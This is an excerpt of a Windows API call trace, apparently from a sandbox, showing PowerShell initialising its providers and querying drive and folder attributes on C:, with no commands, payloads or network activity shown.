	[0062.945] GetLogicalDrives () returned 0x4
	[0062.945] GetLastError () returned 0xcb
	[0062.946] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xae2a8, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0062.946] GetLastError () returned 0xcb
	[0062.946] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0062.946] GetLastError () returned 0xcb
	[0062.946] SetErrorMode (uMode=0x1) returned 0x1
	[0062.949] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x242bd0, nVolumeNameSize=0x32, lpVolumeSerialNumber=0xae7d0, lpMaximumComponentLength=0xae7cc, lpFileSystemFlags=0xae7c8, lpFileSystemNameBuffer=0x242ad0, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xae7d0*=0x64285303, lpMaximumComponentLength=0xae7cc*=0xff, lpFileSystemFlags=0xae7c8*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0062.949] GetLastError () returned 0xcb
	[0062.949] SetErrorMode (uMode=0x1) returned 0x1
	[0062.949] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0062.949] GetLastError () returned 0xcb
	[0062.949] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xae330, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0062.949] GetLastError () returned 0xcb
	[0062.949] SetErrorMode (uMode=0x1) returned 0x1
	[0062.949] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x2906e14 | out: lpFileInformation=0x2906e14*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xe662e5bd, ftCreationTime.dwHighDateTime=0x1ca0427, ftLastAccessTime.dwLowDateTime=0x630b8bd0, ftLastAccessTime.dwHighDateTime=0x1d46cf7, ftLastWriteTime.dwLowDateTime=0x630b8bd0, ftLastWriteTime.dwHighDateTime=0x1d46cf7, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0062.949] GetLastError () returned 0xcb
	[0062.949] SetErrorMode (uMode=0x1) returned 0x1
	[0062.949] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xae330, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0062.950] GetLastError () returned 0xcb
	[0062.950] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xae2bc, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0062.950] GetLastError () returned 0xcb
	[0062.950] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0062.950] GetLastError () returned 0xcb
	[0062.951] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xae278, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0062.951] GetLastError () returned 0xcb
	[0062.951] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0062.951] GetLastError () returned 0xcb
	[0062.951] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xae280, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0062.951] GetLastError () returned 0xcb
	[0062.951] SetErrorMode (uMode=0x1) returned 0x1
	[0062.951] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x2907a6c | out: lpFileInformation=0x2907a6c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xe662e5bd, ftCreationTime.dwHighDateTime=0x1ca0427, ftLastAccessTime.dwLowDateTime=0x630b8bd0, ftLastAccessTime.dwHighDateTime=0x1d46cf7, ftLastWriteTime.dwLowDateTime=0x630b8bd0, ftLastWriteTime.dwHighDateTime=0x1d46cf7, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0062.951] GetLastError () returned 0xcb
	[0062.951] SetErrorMode (uMode=0x1) returned 0x1
	[0062.951] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xae288, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0062.951] GetLastError () returned 0xcb
	[0062.951] SetErrorMode (uMode=0x1) returned 0x1
	[0062.952] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x2907bbc | out: lpFileInformation=0x2907bbc*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xe662e5bd, ftCreationTime.dwHighDateTime=0x1ca0427, ftLastAccessTime.dwLowDateTime=0x630b8bd0, ftLastAccessTime.dwHighDateTime=0x1d46cf7, ftLastWriteTime.dwLowDateTime=0x630b8bd0, ftLastWriteTime.dwHighDateTime=0x1d46cf7, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0062.952] GetLastError () returned 0xcb
	[0062.952] SetErrorMode (uMode=0x1) returned 0x1
	[0062.952] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xae2cc, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0062.952] GetLastError () returned 0xcb
	[0062.952] SetErrorMode (uMode=0x1) returned 0x1
	[0062.952] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x2907d5c | out: lpFileInformation=0x2907d5c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xe662e5bd, ftCreationTime.dwHighDateTime=0x1ca0427, ftLastAccessTime.dwLowDateTime=0x630b8bd0, ftLastAccessTime.dwHighDateTime=0x1d46cf7, ftLastWriteTime.dwLowDateTime=0x630b8bd0, ftLastWriteTime.dwHighDateTime=0x1d46cf7, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0062.952] GetLastError () returned 0xcb
	[0062.952] SetErrorMode (uMode=0x1) returned 0x1
	[0062.952] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x20d6a0, nSize=0xae854 | out: lpNameBuffer="ZGW5TDPU\\2XC7u663GxWc", nSize=0xae854) returned 0x1
	[0062.952] GetLastError () returned 0xcb
	[0062.952] GetUserNameW (in: lpBuffer=0x242ad0, pcbBuffer=0xae85c | out: lpBuffer="2XC7u663GxWc", pcbBuffer=0xae85c) returned 1
	[0062.953] ReportEventW (hEventLog=0x4350004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x290aaac*="FileSystem", lpRawData=0x290a968) returned 1
	[0062.953] GetLastError () returned 0x0
	[0062.954] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242ad0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0062.954] GetLastError () returned 0xcb
	[0062.954] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.954] GetLastError () returned 0xcb
	[0062.954] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae220, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.954] GetLastError () returned 0xcb
	[0062.954] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae220, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.954] GetLastError () returned 0xcb
	[0062.954] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x20d6a0, nSize=0xae854 | out: lpNameBuffer="ZGW5TDPU\\2XC7u663GxWc", nSize=0xae854) returned 0x1
	[0062.955] GetLastError () returned 0xcb
	[0062.955] GetUserNameW (in: lpBuffer=0x242ad0, pcbBuffer=0xae85c | out: lpBuffer="2XC7u663GxWc", pcbBuffer=0xae85c) returned 1
	[0062.955] ReportEventW (hEventLog=0x4350004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x290eb64*="Function", lpRawData=0x290ea20) returned 1
	[0062.955] GetLastError () returned 0x0
	[0062.957] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242ad0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0062.957] GetLastError () returned 0xcb
	[0062.960] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae268, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.960] GetLastError () returned 0xcb
	[0062.960] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae218, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.960] GetLastError () returned 0xcb
	[0062.960] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae218, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.960] GetLastError () returned 0xcb
	[0062.960] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae218, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.960] GetLastError () returned 0xcb
	[0062.985] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x20d6a0, nSize=0xae854 | out: lpNameBuffer="ZGW5TDPU\\2XC7u663GxWc", nSize=0xae854) returned 0x1
	[0062.985] GetLastError () returned 0xcb
	[0062.985] GetUserNameW (in: lpBuffer=0x242ad0, pcbBuffer=0xae85c | out: lpBuffer="2XC7u663GxWc", pcbBuffer=0xae85c) returned 1
	[0062.986] ReportEventW (hEventLog=0x4350004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2927be0*="Registry", lpRawData=0x2927a9c) returned 1
	[0062.986] GetLastError () returned 0x0
	[0062.987] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae254, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.987] GetLastError () returned 0x0
	[0062.987] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae204, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.987] GetLastError () returned 0x0
	[0062.987] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae204, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.987] GetLastError () returned 0x0
	[0062.987] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x20d6a0, nSize=0xae854 | out: lpNameBuffer="ZGW5TDPU\\2XC7u663GxWc", nSize=0xae854) returned 0x1
	[0062.987] GetLastError () returned 0x0
	[0062.988] GetUserNameW (in: lpBuffer=0x242ad0, pcbBuffer=0xae85c | out: lpBuffer="2XC7u663GxWc", pcbBuffer=0xae85c) returned 1
	[0062.988] ReportEventW (hEventLog=0x4350004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x292b990*="Variable", lpRawData=0x292b84c) returned 1
	[0062.988] GetLastError () returned 0x0
	[0062.989] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242ad0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0062.989] GetLastError () returned 0xcb
	[0062.991] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242ad0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0062.991] GetLastError () returned 0xcb
	[0062.992] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xae254, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0062.992] GetLastError () returned 0xcb
	[0062.992] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xae204, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0062.992] GetLastError () returned 0xcb
	[0062.992] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xae204, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0062.992] GetLastError () returned 0xcb
	[0062.992] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xae204, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0062.992] GetLastError () returned 0xcb
	[0063.024] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x20d6a0, nSize=0xae854 | out: lpNameBuffer="ZGW5TDPU\\2XC7u663GxWc", nSize=0xae854) returned 0x1
	[0063.025] GetLastError () returned 0x3
	[0063.025] GetUserNameW (in: lpBuffer=0x242ad0, pcbBuffer=0xae85c | out: lpBuffer="2XC7u663GxWc", pcbBuffer=0xae85c) returned 1
	[0063.026] ReportEventW (hEventLog=0x4350004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x293971c*="Certificate", lpRawData=0x29395d8) returned 1
	[0063.026] GetLastError () returned 0x0
	[0063.033] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242ad0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0063.033] GetLastError () returned 0xcb
	[0063.037] GetLogicalDrives () returned 0x4
	[0063.037] GetLastError () returned 0xcb
	[0063.037] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xae3cc, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0063.037] GetLastError () returned 0xcb
	[0063.037] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0063.037] GetLastError () returned 0xcb
	[0063.037] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x242ad0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0063.037] GetLastError () returned 0xcb
	[0063.038] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242ad0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0063.038] GetLastError () returned 0xcb
	[0063.038] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242ad0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0063.038] GetLastError () returned 0xcb
	[0063.047] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242ad0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0063.047] GetLastError () returned 0xcb
	[0063.048] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242ad0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0063.048] GetLastError () returned 0xcb
	[0063.048] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xae214, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0063.048] GetLastError () returned 0xcb
	[0063.048] SetErrorMode (uMode=0x1) returned 0x1
	[0063.048] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x294063c | out: lpFileInformation=0x294063c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb15659b, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x3a13b080, ftLastAccessTime.dwHighDateTime=0x1d4d68e, ftLastWriteTime.dwLowDateTime=0x3a13b080, ftLastWriteTime.dwHighDateTime=0x1d4d68e, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0063.048] GetLastError () returned 0xcb
	[0063.048] SetErrorMode (uMode=0x1) returned 0x1
	[0063.049] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xae21c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0063.049] GetLastError () returned 0xcb
	[0063.049] SetErrorMode (uMode=0x1) returned 0x1
	[0063.049] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x29407d0 | out: lpFileInformation=0x29407d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb15659b, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x3a13b080, ftLastAccessTime.dwHighDateTime=0x1d4d68e, ftLastWriteTime.dwLowDateTime=0x3a13b080, ftLastWriteTime.dwHighDateTime=0x1d4d68e, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0063.049] GetLastError () returned 0xcb
	[0063.049] SetErrorMode (uMode=0x1) returned 0x1
	[0063.049] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242ad0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0063.049] GetLastError () returned 0xcb
	[0063.050] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xae364, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0063.050] GetLastError () returned 0xcb
	[0063.050] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xae2e0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0063.050] GetLastError () returned 0xcb
	[0063.050] SetErrorMode (uMode=0x1) returned 0x1
	[0063.050] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xae760 | out: lpFileInformation=0xae760*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xe662e5bd, ftCreationTime.dwHighDateTime=0x1ca0427, ftLastAccessTime.dwLowDateTime=0x630b8bd0, ftLastAccessTime.dwHighDateTime=0x1d46cf7, ftLastWriteTime.dwLowDateTime=0x630b8bd0, ftLastWriteTime.dwHighDateTime=0x1d46cf7, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0063.050] GetLastError () returned 0xcb
	[0063.050] SetErrorMode (uMode=0x1) returned 0x1
	[0063.051] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xae2e0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0063.051] GetLastError () returned 0xcb
	[0063.051] SetErrorMode (uMode=0x1) returned 0x1
	[0063.051] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xae760 | out: lpFileInformation=0xae760*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xe662e5bd, ftCreationTime.dwHighDateTime=0x1ca0427, ftLastAccessTime.dwLowDateTime=0x630b8bd0, ftLastAccessTime.dwHighDateTime=0x1d46cf7, ftLastWriteTime.dwLowDateTime=0x630b8bd0, ftLastWriteTime.dwHighDateTime=0x1d46cf7, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0063.051] GetLastError () returned 0xcb
	[0063.051] SetErrorMode (uMode=0x1) returned 0x1
	[0063.051] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xae2f4, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0063.051] GetLastError () returned 0xcb
	[0063.051] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xae290, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0063.051] GetLastError () returned 0xcb
	[0063.051] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xae2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0063.051] GetLastError () returned 0xcb
	[0063.051] SetErrorMode (uMode=0x1) returned 0x1
	[0063.051] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0xae760 | out: lpFileInformation=0xae760*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa191445, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x8797820, ftLastAccessTime.dwHighDateTime=0x1d4d67f, ftLastWriteTime.dwLowDateTime=0x8797820, ftLastWriteTime.dwHighDateTime=0x1d4d67f, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0063.051] GetLastError () returned 0xcb
	[0063.051] SetErrorMode (uMode=0x1) returned 0x1
	[0063.051] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xae2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0063.051] GetLastError () returned 0xcb
	[0063.051] SetErrorMode (uMode=0x1) returned 0x1
	[0063.051] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0xae760 | out: lpFileInformation=0xae760*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa191445, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x8797820, ftLastAccessTime.dwHighDateTime=0x1d4d67f, ftLastWriteTime.dwLowDateTime=0x8797820, ftLastWriteTime.dwHighDateTime=0x1d4d67f, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0063.051] GetLastError () returned 0xcb
	[0063.051] SetErrorMode (uMode=0x1) returned 0x1
	[0063.051] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xae2f4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0063.051] GetLastError () returned 0xcb
	[0063.051] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0xae290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0063.051] GetLastError () returned 0xcb
	[0063.052] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xae2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0063.052] GetLastError () returned 0xcb
	[0063.052] SetErrorMode (uMode=0x1) returned 0x1
	[0063.052] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xae760 | out: lpFileInformation=0xae760*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb15659b, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x3a13b080, ftLastAccessTime.dwHighDateTime=0x1d4d68e, ftLastWriteTime.dwLowDateTime=0x3a13b080, ftLastWriteTime.dwHighDateTime=0x1d4d68e, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0063.052] GetLastError () returned 0xcb
	[0063.052] SetErrorMode (uMode=0x1) returned 0x1
	[0063.052] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xae2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0063.052] GetLastError () returned 0xcb
	[0063.052] SetErrorMode (uMode=0x1) returned 0x1
	[0063.052] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xae760 | out: lpFileInformation=0xae760*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb15659b, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x3a13b080, ftLastAccessTime.dwHighDateTime=0x1d4d68e, ftLastWriteTime.dwLowDateTime=0x3a13b080, ftLastWriteTime.dwHighDateTime=0x1d4d68e, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0063.052] GetLastError () returned 0xcb
	[0063.052] SetErrorMode (uMode=0x1) returned 0x1
	[0063.052] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xae2f4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0063.052] GetLastError () returned 0xcb
	[0063.052] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0xae290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0063.052] GetLastError () returned 0xcb
	[0063.052] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xae2ec, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0063.052] GetLastError () returned 0xcb
	[0063.052] SetErrorMode (uMode=0x1) returned 0x1
